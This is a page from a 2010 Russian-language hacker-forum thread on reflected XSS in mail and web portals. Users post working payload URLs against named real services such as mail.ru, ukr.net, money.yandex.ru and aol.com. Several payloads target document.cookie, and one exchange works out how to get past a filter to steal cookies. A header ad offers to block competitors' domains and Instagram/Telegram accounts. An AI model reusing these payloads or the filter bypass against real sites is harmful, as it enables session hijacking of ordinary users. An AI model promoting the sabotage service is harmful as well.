УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 15 из 25

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#141

24.05.2010, 16:24

life_glider

Познающий

Регистрация: 13.04.2010

Сообщений: 42

Провел на форуме:
460968

Репутация: 81

http://mbox.i.ua/list/INBOX/?fMask=0&fReq=0&sort=2"><script>alert("FOUND BY LIFE-GLIDER")</script><br%20tr="&p=0&_rand=1274703519

#142

25.05.2010, 01:06

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Код:

http://job.ukr.net/vacancy/?AdvancedSearch=0&ShowSearchResults=1&event=&sd=-2&Keywords="><img src=foo.png onerror=alert('kusto') />

#143

11.06.2010, 18:35

BlackFan

Новичок

Регистрация: 03.01.2009

Сообщений: 27

Провел на форуме:
367442

Репутация: 41

http://maps.mail.ru

В строке поиска:

Код:

' onMouseOver='alert(1)'>

и "Найти"

kards.qip.ru
В любых комментариях в login/pass вставляем

Код:

"><img src='.' onerror='alert()'>

И нажимаем "Добавить комментарий"

Последний раз редактировалось BlackFan; 14.06.2010 в 16:03..

#144

05.07.2010, 17:49

BlackFan

Новичок

Регистрация: 03.01.2009

Сообщений: 27

Провел на форуме:
367442

Репутация: 41

http://rabota.mail.ru

Код:

Code:
http://rabota.mail.ru/vac_search/?go=1&city=1'%3Balert(1)%3Ba='

crackmail: не пашет.

пффф, уже пофиксили

#145

24.08.2010, 13:21

BluR

Познающий

Регистрация: 06.08.2009

Сообщений: 56

Провел на форуме:
425261

Репутация: 29

Отправить сообщение для BluR с помощью ICQ

money.yandex.ru

https://money.yandex.ru/feedback/?themeTitle=deception&userTheme=1//-->alert(document.cookie)

#146

15.09.2010, 16:38

satana666

Новичок

Регистрация: 10.04.2009

Сообщений: 27

Провел на форуме:
1838381

Репутация: 30

Отправить сообщение для satana666 с помощью ICQ

rambler.ru

Вроде ещё не выкладывали.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//horoscopes.rambler.ru/names.html?words=">alert('XSS')[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//dating.meta.ua/search.php?action=search&min_age=">alert(/XSS/)[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//index.online.ua/?cx=&q=">alert('XSS')[/COLOR][/COLOR]

ukr.net

Не знаю выкладывали или нет, гугл не ответил точно.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//freemail.ukr.net/q/reg?name=">alert('XSS')[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kino.ukr.net/subscribe/email%3D%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E[/COLOR][/COLOR]

#147

01.10.2010, 21:46

Unknown

Guest

Сообщений: n/a

Провел на форуме:
272

Репутация: 5

mail.ru

Парочка пассивных xss на форумах mail.ru

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//forum.lady.mail.ru/topic.html?fid=22&tid=28428&sub=6964&old_pg=&old_id=alert("xss")[/COLOR][/COLOR]

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//forum.health.mail.ru/topic.html?fid=114&tid=2137&sub=%3Cscript%3Ealert(%22xss%22)%3C/script%3E[/COLOR][/COLOR]

#148

19.10.2010, 08:38

satana666

Новичок

Регистрация: 10.04.2009

Сообщений: 27

Провел на форуме:
1838381

Репутация: 30

Пасcивка на mail.ru

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//starlook.lady.mail.ru/commented?">alert('XSS')[/COLOR][/COLOR]

Вот только в alert(document.cookie) точка заменяется на _

Это можно как-нибудь обойти?

#149

19.10.2010, 22:48

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Цитата:

Сообщение от satana666

satana666 said:
Пасcивка на mail.ru

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//starlook.lady.mail.ru/commented?">alert('XSS')[/COLOR][/COLOR]

Вот только в alert(document.cookie) точка заменяется на _
Это можно как-нибудь обойти?

так будет лучше.

Код HTML:

HTML:
http://starlook.lady.mail.ru/commented?period=month">alert(document.cookie)

Зря выложил ее, завтра уже будет закрыта.

#150

23.10.2010, 23:19

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

Код HTML:

HTML:
http://help.aol.com/help/microsites/searchEntry.do?&searchString=">alert(document.cookie)

Страница 15 из 25

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход